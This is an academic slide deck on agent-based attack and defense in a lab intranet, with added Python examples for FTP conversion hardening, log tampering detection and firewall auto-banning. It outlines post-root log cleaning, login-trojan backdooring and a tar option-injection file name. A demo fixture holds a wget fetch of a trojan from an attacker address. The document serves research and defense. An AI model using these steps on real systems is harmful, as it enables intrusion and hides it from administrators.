1
Agent-Based Attack and Defense for an Intranet Environment
  • Dr. Yuh-Jong Hu
  • Tsai Chang-hsien, and Pan Hsien-kuo
  • {jong, s8514, s8552}@cherry.cs.nccu.edu.tw
  • Emerging Network Technology (ENT) Lab
  • Dept. of Computer Science
  • National Chengchi University, Taipei, Taiwan

2
Software Agent Definitions
  • An agent is a computer system, situated in some environment, that is capable of flexible autonomous action in order to meet its design objectives (1).
  • Three key concepts in this definition: situatedness, autonomy, and flexibility.
  • Software agents can be classified as stationary agents and mobile agents.
  • Mobile agent security concerns are host protection, agent protection, and agent trustworthiness; the only stationary agent security concern is agent trustworthiness.

3
Definitions of Information Warfare
  • Information warfare consists of those actions intended to protect, exploit, corrupt, deny, or destroy information or information resources in order to achieve a significant advantage, objective, or victory over an adversary (17).
  • Information warfare can be dichotomized into (5)(6):
  • Offensive information warfare
  • Defensive information warfare
  • Offensive and defensive information warfare are treated as a primal and dual problem.

4
Definitions of Information Warfare (Cont.)
  • Offensive information warfare operations produce a win-lose outcome by altering the availability and integrity of information resources to the benefit of the offense and the detriment of the defense (5).
  • Defensive information warfare seeks to protect information resources from attack, to preserve the value of those resources, or, in the event of a successful attack, to recover the lost value (5).

5
Internet vs. Intranet Information Warfare
  • Intranet information warfare is exercised inside a protected network domain, with a firewall as gatekeeper.
  • The domain of Internet information warfare is far larger than a single Intranet subdomain, so Internet warfare is much harder to simulate.
  • Internet information warfare favors the offensive side, because the defender's weak points are spread over a much wider area.

6
Why Agent-Based Information Warfare?
  • Purely manual information warfare operations are cumbersome and tedious, and attack and defense strategies are not easy to formulate.
  • Agent-based information warfare provides autonomous, proactive, reactive, and cooperative attack/defense operations.
  • Attack/defense strategies become easy to formulate, and launching an attack/defense operation is transparent to the operator.
  • Agent-based information warfare does not exclude manual attack/defense.

7
How Agent-Based Information Warfare?
  • Software agent characteristics such as situatedness, autonomy, and flexibility (responsive, pro-active, social) are demonstrated in agent-based offensive and defensive information warfare.
  • Agents are classified into several categories, each playing a specific mission in our offensive/defensive information warfare.
  • Existing manually operated code for exploiting system vulnerabilities is reused in our agent-based offense, including scanners, remote exploits, local exploits, and monitoring tools.

8
How Agent-Based Information Warfare? (Cont.)
  • All of our offensive/defensive agents are coded in Java, so we must handle the integration problems between Java and the existing intrusion tools.
  • The offensive and defensive sides were developed by two different groups, and the warfare lasted 5 days in our ENT lab Intranet.
  • Agent-based offensive/defensive information warfare can be initiated by anyone, even someone without much cyberspace attack and defense knowledge.
  • We expect agent technology to increase the power of both attack and defense.

10
Information Warfare Win-Lose Criteria
  • The offensive group and the defensive group discussed the project together but implemented their systems separately.
  • The advantage of the offensive group is familiarity with our Intranet environment, which spares it much further probing.
  • The advantage of the defensive group is the protection of the firewall, whose security policies can be adjusted flexibly.
  • In general, there are several win-lose criteria for evaluating what the offensive and defensive sides achieve.
  • We did not consider social engineering attack/defense issues in our agent-based system.

11
Information Warfare Win-Lose Criteria (Cont.)
  • Win-lose criteria for the offensive group: carry out the following attacks successfully
  • denial of service attack
  • data integrity attack
  • data confidentiality attack
  • attack gaining an end-user (general permission) account
  • attack exploiting a vulnerability to gain root privileges

12
Information Warfare Win-Lose Criteria (Cont.)
  • Win-lose criteria for the defensive group: carry out the following defenses successfully
  • detect all kinds of attacks in a timely manner
  • accurately decide the attack category
  • properly react to the anomalous intrusion
  • effectively recover from a successful attack
  • cooperate with the firewall to counter similar attacks

13
Agent-Based Offensive Information Warfare
  • Scanning, remote exploiting, local exploiting, monitoring, and stealth (1) are all exercised via software agents.
  • Offensive software agents are classified as scanning agent, master agent, attack agent, and repository agent.
  • The scanning agent wraps the Nessus probing tools.
  • The master agent is the decision maker that launches the right exploit code based on the scanning agents' probing results.
  • The attack agent loads the right exploit code and attacks.
  • The repository agent stores and classifies the exploit codes for future attacks.

14
Agent-Based Offensive Information Warfare (Cont.)
  • The offensive procedure is:
  • (1) The master agent submits targets (IP addresses) to the scanning agents.
  • (2) The scanning agents probe the targets.
  • (3) The scanning agents return the collected information to the master agent.
  • (4) The master agent analyzes the information and decides on suitable attack policies and mechanisms.
  • (5) The master agent fires the attack actions and the attack agents carry out the real attack.
  • (6) If a root account is obtained, the agent cleans the log files and sets up a backdoor for future similar attacks.

15
Master Agent GUI
16
Tools and Techniques for Agent-Based Offensive Information Warfare
  • Nessus scanning tools
  • Java socket
  • JNI (Java Native Interface)
  • Rootkit
  • Loki2
  • Crack
  • SATAN
  • Back Orifice

17
Java Native Interface
(Diagram, labels only: Attack Agent, JNI, Exploit Code Database, Attacking)
18
JNI Implementation
  • For example, when the exploit code is written in C:
  • (1) Write a Java class with a native method that loads and calls the exploit code.
  • (2) Use javah to generate a .h header file from the compiled Java class.
  • (3) Include the .h file in the exploit code.
  • (4) Use JNI calls in the exploit code to pass the parameters between Java and C.
  • (5) Compile the exploit code into a new shared library that the Java agent loads.

19
Agent Communication Interfaces
(Diagram, labels only: Master Agent, Repository Agent, Generator Agent, Detect Agent, Log Agent, Attack Agent, Attack Tools, JNI; message labels: Detect, Scan, Analyze, Attack, Parse)
20
Attack Methods
  • Sniffer
  • FTP conversion attack
  • Userhelper and PAM vulnerability
  • Backdooring
  • Log cleaning

21
FTP Conversion Attack
  • A user can have data converted/archived/compressed on the fly when retrieving files from an FTP server.
  • The client requests a file name with .tar/.tar.gz/.Z/.gz appended to it.
  • The base name is handed to tar as an argument, so a name that has the form of a tar option is taken as one:
  • --use-compress-program PROG
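
The following is an added example, not code from the presentation. It models how a conversion-enabled FTP server builds the converter command line from the requested name, places the vulnerable construction beside a hardened one, and shows which client-controlled argument the converter would read as an option. The conversion table, the server paths and the example program name are assumptions; nothing here executes tar.

```python
"""Model of an FTP server's on-the-fly conversion argv construction.

Added example, not code from the presentation; it never executes tar, it
only builds and inspects the argv the server would spawn."""

# Constructed conversion table in the spirit of wu-ftpd's /etc/ftpconversions
# (assumed entries; the presentation names only the suffixes).
CONVERSIONS = {
    ".tar":    ["/bin/tar", "-c", "-f", "-"],
    ".tar.gz": ["/bin/tar", "-c", "-z", "-f", "-"],
    ".gz":     ["/bin/gzip", "-9", "-c"],
    ".Z":      ["/bin/compress", "-c"],
}


def split_request(requested):
    """Split a RETR argument into (base_name, conversion_suffix).

    Longest suffix wins so that 'x.tar.gz' is matched by '.tar.gz', not '.gz'.
    Returns (requested, None) when no conversion suffix is present.
    """
    for suffix in sorted(CONVERSIONS, key=len, reverse=True):
        if requested.endswith(suffix) and len(requested) > len(suffix):
            return requested[: -len(suffix)], suffix
    return requested, None


def build_argv_vulnerable(requested):
    """The flaw: the client-supplied base name is appended as a bare argument.

    A name beginning with '--' (e.g. '--use-compress-program=PROG') is parsed
    by tar as an option, so the client chooses a program that tar executes.
    """
    base, suffix = split_request(requested)
    if suffix is None:
        return None
    return CONVERSIONS[suffix] + [base]


def build_argv_hardened(requested):
    """Refuse names that look like options and anchor the rest with './',
    so no converter can ever see the client's name as an option."""
    base, suffix = split_request(requested)
    if suffix is None:
        return None
    if base.startswith("-"):
        raise ValueError("refusing option-like file name: %r" % base)
    return CONVERSIONS[suffix] + ["./" + base]


def injected_options(requested, builder):
    """Return the client-controlled arguments a converter would read as options."""
    argv = builder(requested)
    if argv is None:
        return []
    _, suffix = split_request(requested)
    fixed = len(CONVERSIONS[suffix])
    return [arg for arg in argv[fixed:] if arg.startswith("-")]
```

The hardened builder applies two independent fixes: rejecting any base name that starts with a dash, and prefixing the name with `./` so that even a converter whose option parser is unknown cannot mistake it for a flag. Either alone closes the hole described on the slide; keeping both is cheap defence in depth.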

22
Backdooring
  • Back up the passwd/shadow files
  • Add a temporary user
  • Obtain a login trojan
  • Install the login trojan
  • Be smart

23
Log Cleaning
  • /etc/syslog.conf (tells where syslogd writes)
  • /var/log/messages
  • /var/log/secure (TCP Wrapper log)
  • /var/log/xferlog (FTP transfer log)
  • /var/log/wtmp (login records)
  • ~/.bash_history
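
The defensive counterpart to this slide, as an added example that is not code from the presentation: a responsive agent can treat every log above as append-only and compare it against a recorded baseline. The check below tells apart a log that merely grew from one that was shrunk (lines filtered out or the file zeroed), rewritten in place, or unlinked and replaced by an edited copy. The log contents, the attacker address and the temporary directory are constructed for the demo.

```python
"""Append-only integrity check for the log files a log cleaner targets.

Added example, not code from the presentation: record a baseline for each
log, then decide whether the file grew the way a log should or was shrunk,
rewritten in place, or swapped for an edited copy."""
import hashlib
import os
import tempfile


def _sha256(data):
    return hashlib.sha256(data).hexdigest()


def take_baseline(paths):
    """Record inode, size and content hash of every log we want to protect."""
    base = {}
    for path in paths:
        with open(path, "rb") as fh:
            data = fh.read()
        base[path] = {"inode": os.stat(path).st_ino, "size": len(data), "sha256": _sha256(data)}
    return base


def check_logs(baseline, paths):
    """Classify each log against its baseline.

    replaced  : different inode, the file was unlinked and a new one written
    shrunk    : smaller than before, lines were removed or the file zeroed
    rewritten : same size or larger but the old prefix no longer hashes the same
    ok        : old content intact, only appended to (normal logging)
    """
    verdicts = {}
    for path in paths:
        old = baseline[path]
        with open(path, "rb") as fh:
            data = fh.read()
        if os.stat(path).st_ino != old["inode"]:
            verdicts[path] = "replaced"
        elif len(data) < old["size"]:
            verdicts[path] = "shrunk"
        elif _sha256(data[: old["size"]]) != old["sha256"]:
            verdicts[path] = "rewritten"
        else:
            verdicts[path] = "ok"
    return verdicts


def demo():
    """Constructed scenario: five logs, one honest append, four cleaner tricks."""
    attacker = b"10.0.0.66"  # constructed attacker address
    logs = {  # constructed log contents
        "messages": b"Jan 1 10:00:01 host login: ROOT LOGIN ON tty1\n"
                    b"Jan 1 10:02:13 host ftpd: connection from 10.0.0.66\n",
        "secure": b"Jan 1 10:02:13 host in.ftpd: connect from 10.0.0.66\n",
        "xferlog": b"Mon Jan 1 10:03:00 2000 1 10.0.0.66 512 /pub/README a _ o a ftp ftp 0 * c\n",
        "wtmp": b"root\x00tty1\x00" * 4,
        "bash_history": b"wget 10.0.0.66/login\ncp login /bin/login\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        paths = {name: os.path.join(tmp, name) for name in logs}
        for name, content in logs.items():
            with open(paths[name], "wb") as fh:
                fh.write(content)
        baseline = take_baseline(paths.values())

        # honest append: the FTP server logged one more transfer
        with open(paths["xferlog"], "ab") as fh:
            fh.write(b"Mon Jan 1 10:04:00 2000 1 10.0.0.7 40 /pub/INDEX a _ o a ftp ftp 0 * c\n")
        # cleaner 1: filter the attacker's lines out of messages (same inode, smaller)
        kept = [line for line in logs["messages"].splitlines(True) if attacker not in line]
        with open(paths["messages"], "wb") as fh:
            fh.write(b"".join(kept))
        # cleaner 2: zero the TCP Wrapper log
        open(paths["secure"], "wb").close()
        # cleaner 3: write an edited wtmp to a new file and rename it over the original
        edited = os.path.join(tmp, "wtmp.edit")
        with open(edited, "wb") as fh:
            fh.write(b"root\x00tty1\x00" * 3)
        os.replace(edited, paths["wtmp"])
        # cleaner 4: overwrite the address in place with one of the same length
        with open(paths["bash_history"], "r+b") as fh:
            data = fh.read().replace(attacker, b"10.0.0.77")
            fh.seek(0)
            fh.write(data)

        verdicts = check_logs(baseline, paths.values())
        return {name: verdicts[path] for name, path in paths.items()}
```

The baseline must live somewhere the attacker cannot reach once root is obtained (the supervisor host, or a remote store), otherwise the cleaner simply rebaselines after editing. A verdict of `shrunk` or `replaced` is what the deck's "clean the log files" step produces; `rewritten` catches the more careful cleaner that keeps sizes constant.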

24
Agent-Based Defensive Information Warfare
  • Intrusion detection, attack recognition and reaction, counterattack, and damage recovery are all operated via software agents.
  • Defensive software agents follow a client-server model, with responsive agents on the client (host) side and a supervisor agent on the server side.
  • A responsive agent is composed of an agent manager, a security manager, and a group of Java agent entities.
  • The supervisor agent is composed of an alert manager, a decision manager, an agent register, and a host display.

25
Agent-Based Defensive Information Warfare (Cont.)
  • Responsive agents are responsible for detecting all kinds of intrusion in a timely manner, so they are distributed over all hosts of the Intranet.
  • The supervisor agent accurately decides the intrusion category and properly reacts to the anomalous intrusion.
  • The supervisor agent, together with the responsive agents, must recover effectively from a successful attack.
  • The supervisor agent and the group of responsive agents cooperate with the firewall to counter any kind of attack.

28
Defensive Steps
(Diagram, labels only. Server side: Supervisor Agent containing Alert Manager, Decision Manager, and Host Display. Client side: Responsive Agent containing Agent Manager and three Agent entities that watch the host's Services. Numbered arrows 1 to 10 between these components give the order of the defensive steps.)
31
Supervisor GUI
32
Supervisor GUI
33
Tools and Techniques for Agent-Based Defensive Information Warfare
  • Check Point FireWall-1
  • Apache Web Server
  • War-FTP
  • Sniffer
  • Java programming language
  • Scanner for detecting internal Intranet/host weaknesses
  • Log file analyzer for:
  • system status report
  • network status report
  • network services report

34
FireWall Authentication
  • Use client authentication and user authentication to protect the TELNET and FTP services.
  • After successful client authentication, connections are allowed from that specific IP address.
  • When a rule specifies user authentication, the corresponding FireWall-1 security server is invoked to mediate the associated connections.

35
Agent-Based Defensive Rule
  • When an agent entity detects denial of the Telnet or FTP service, the supervisor agent bans the IP address that initiated the attack.
  • When an agent entity detects a mail bomb, the supervisor agent bans the IP address that initiated the attack.
  • When an agent entity detects denial of the HTTP service, the supervisor agent alerts the system administrator.
  • An agent entity checks the services that FireWall-1 allows and reports whether each of them is still alive.
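
The four rules above as a decision manager, written here as an added example and not the ENT lab's code. The event format, the `never_ban` list and the injected `probe` function are assumptions; the page does not describe how the supervisor pushed a ban into FireWall-1, so the firewall is represented by the set of addresses it would be told to block. The Day 1 service list of slide 38 serves as the allowed-services list.

```python
"""Supervisor-side decision manager for the deck's four defensive rules.

Added example, not the ENT lab's code; event format, never_ban list and the
probe callback are assumptions."""


class DecisionManager:
    def __init__(self, allowed_services, probe, never_ban=()):
        # Services the firewall policy currently permits (Day 1 list of the deck).
        self.allowed_services = list(allowed_services)
        # probe(host, service) -> bool; injected so the example runs offline.
        self.probe = probe
        # Hosts that must never be banned (supervisor, firewall, gateway). An
        # attacker who can spoof a source address would otherwise turn the
        # auto-ban rule into a denial of service against our own hosts.
        self.never_ban = set(never_ban)
        self.banned = set()   # addresses the firewall is asked to block
        self.alerts = []      # messages for the system administrator

    def _ban(self, src, reason):
        if src in self.never_ban:
            self.alerts.append("refused to ban protected host %s (%s)" % (src, reason))
            return ("alert", src)
        self.banned.add(src)
        return ("ban", src)

    def handle(self, event):
        """Apply one agent-entity report; return the action taken."""
        kind, service, src = event["kind"], event.get("service"), event.get("src")
        if kind == "dos" and service in ("telnet", "ftp"):   # rule 1
            return self._ban(src, "denial of %s service" % service)
        if kind == "mail_bomb":                               # rule 2
            return self._ban(src, "mail bomb")
        if kind == "dos" and service == "http":               # rule 3
            self.alerts.append("HTTP service under denial of service from %s" % src)
            return ("alert", src)
        return ("ignore", src)                                # no rule on the deck

    def services_report(self, host):
        """Rule 4: for every service the firewall allows, is it still answering?"""
        return {svc: ("alive" if self.probe(host, svc) else "down")
                for svc in self.allowed_services}


# Constructed scenario (assumed addresses and events).
DAY1_SERVICES = ["smtp", "ftp", "http", "telnet"]
EVENTS = [
    {"kind": "dos", "service": "ftp", "src": "192.168.1.50"},
    {"kind": "mail_bomb", "src": "192.168.1.51"},
    {"kind": "dos", "service": "http", "src": "192.168.1.52"},
    {"kind": "dos", "service": "telnet", "src": "192.168.1.1"},  # spoofed as the gateway
    {"kind": "portscan", "src": "192.168.1.53"},                 # no rule for this on the deck
]
# Constructed service state standing in for a real TCP connect probe.
DOWN = {("192.168.1.10", "ftp")}


def fake_probe(host, service):
    return (host, service) not in DOWN


def run_scenario():
    dm = DecisionManager(DAY1_SERVICES, fake_probe, never_ban={"192.168.1.1"})
    actions = [dm.handle(e) for e in EVENTS]
    return actions, sorted(dm.banned), dm.alerts, dm.services_report("192.168.1.10")
```

Banning on a single report is what the slide specifies; in practice the `never_ban` set and a threshold on repeated reports are the minimum needed to keep a spoofed denial-of-service report from turning the supervisor against the Intranet's own hosts.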

36
Agent-Based Offensive Information Warfare vs. Firewall Services
  • Agent-based offensive information warfare must adjust its attack strategy to the level of firewall services in force.
  • Configuring the firewall's network services lets us simulate attacks under different degrees of tightness of the network security policy and mechanisms.
  • The tightest control of the firewall's network services may eliminate many outside attack events, but it also reduces network service availability and flexibility.

37
Agent-Based Defensive Information Warfare vs. Firewall Services
  • Agent-based defensive information warfare aims at intrusion detection, so it must cooperate with the firewall's intrusion prevention.
  • Ideally, defense agents dynamically adjust the level of firewall services based on system status, network status, and end-user service requests.
  • Awareness of the current level of firewall services greatly reduces the effort needed to analyze the system/network log files.

38
Downgrade Firewall Services for Different Phases of Warfare
  • The information warfare lasted 5 days, and the FireWall-1 service policy was downgraded step by step, permitting more services through the firewall each day, to simulate the protection levels found on the real-world Internet.
  • Day 1: smtp, ftp, http, telnet
  • Day 2: default
  • Day 3: gopher, pop-3, tftp, who
  • Day 4: dns, echo, nntp, ntp-tcp
  • Day 5: all

39
Fictitious Auction Server for Mobile Agent Services (Not Done Yet)
  • A fictitious auction server is to be set up within the Intranet so that mobile agents can bid on the auction items.
  • In general, a firewall does not authenticate or authorize mobile agents (code), so the auction server must handle this issue itself.
  • Flexibility and security are always in conflict: mobile agents provide flexible bidding services but reduce Intranet security.
  • The popularity of Java makes it feasible to provide mobile code services within the Intranet.

40
Mobile Agent Security Issues
  • Mobile agent (code) security is an emerging research problem because of the attractiveness of mobile agent services and the popularity of Java mobile code.
  • Host (network) protection, agent protection, and agent trustworthiness are the major research issues.
  • Host (network) protection is a traditional problem, except that the constraints on accepting foreign code are relaxed.
  • Agent protection is a hard problem.
  • Agent trustworthiness is handled via agent authentication and authorization.

41
Mobile Agent Authentication and Authorization
  • Java 2 provides some basic authentication and authorization mechanisms, but they are not enough.
  • The existing X.509 authentication framework may not be general and robust enough to handle the mobile agent authentication and authorization problem.
  • We need a distributed trust management framework that allows us to generate many mobile agents which can be verified and granted access rights dynamically.
  • A mobile agent system engine must be set up on each platform before the Intranet can provide mobile code services.

42
Conclusion
  • Offensive and defensive information warfare must be considered together in order to realize the attack and defense strategies in an optimal manner, so we regard them as a primal and dual problem.
  • Which software agent characteristics can be shown, in agent-based information warfare, to enhance our attack or defense power is the primary question behind our adoption of agent technology.
  • We do not yet know the power of agent-based information warfare for the Internet or for social engineering attack and defense.

43
References
  • (1) Boulanger, A., Catapults and grappling hooks: The tools and techniques of information warfare. IBM Systems Journal, 37(1), 1998, 106-114.
  • (2) Cohen, Fred, Information System Attacks: A Preliminary Classification Scheme. Computers & Security, 16(1997), 29-46.
  • (3) Cohen, Fred, Information Systems Defences: A Preliminary Classification Scheme. Computers & Security, 16(1997), 94-114.

44
References (Cont.)
  • (4) Crosbie, M. and Spafford, E., Defending a Computer System using Autonomous Agents. http://www.cs.purdue.edu/coast/projects/autonomous-agents.html
  • (5) Denning, Dorothy E., Information Warfare and Security. Addison-Wesley, 1999.
  • (6) Denning, Dorothy E., Cyberspace Attacks and Countermeasures. In: Internet Besieged: Countering Cyberspace Scofflaws. Addison-Wesley, 1998.

45
References (Cont.)
  • (7) Farmer, D. and Venema, W., Improving the Security of Your Site by Breaking Into it. http://www.epm.ornl.gov/dunigan/cracking.html
  • (8) Farmer, D. and Venema, W., SATAN: Security Analysis Tool for Auditing Networks.
  • (9) Farmer, D. and Spafford, E., The COPS Security Checker System. Proceedings of the Summer USENIX Conference, 1990, 165-170.
  • (10) Forrest, S., Hofmeyr, S. A., and Somayaji, A., Computer Immunology. CACM, 40(10), Oct. 1997.

46
References (Cont.)
  • (11) Greenberg, M. S., Byington, J. C., and Harper, D. G., Mobile Agents and Security. IEEE Communications Magazine, July 1998.
  • (12) Jennings, N. R., Sycara, K., and Wooldridge, M., A Roadmap of Agent Research and Development. Autonomous Agents and Multi-Agent Systems, 1, 7-38, 1998.
  • (13) Mukherjee, B., Heberlein, L. T., and Levitt, K. N., Network Intrusion Detection. IEEE Network, 8(3), 26-41, May/June 1994.
  • (14) The Nessus Project, http://www.nessus.org.

47
References (Cont.)
  • (15) Paller, A., SHADOW (SANS's Heuristic Analysis for Defensive Online Warfare), SANS Institute, http://www.sans.org.
  • (16) Porras, P. A. and Neumann, P. G., EMERALD: Event Monitoring Enabling Responses to Anomalous Live Disturbances. 1997 National Information Systems Security Conference, http://www.csl.sri.com/intrusion.html.
  • (17) Schwartau, Winn, Information Warfare, 2nd Edition, Thunder's Mouth Press, 1996, p. 12.
  • (18) Thorn, T., Programming Languages for Mobile Code. ACM Computing Surveys, 29(3), Sep. 1997.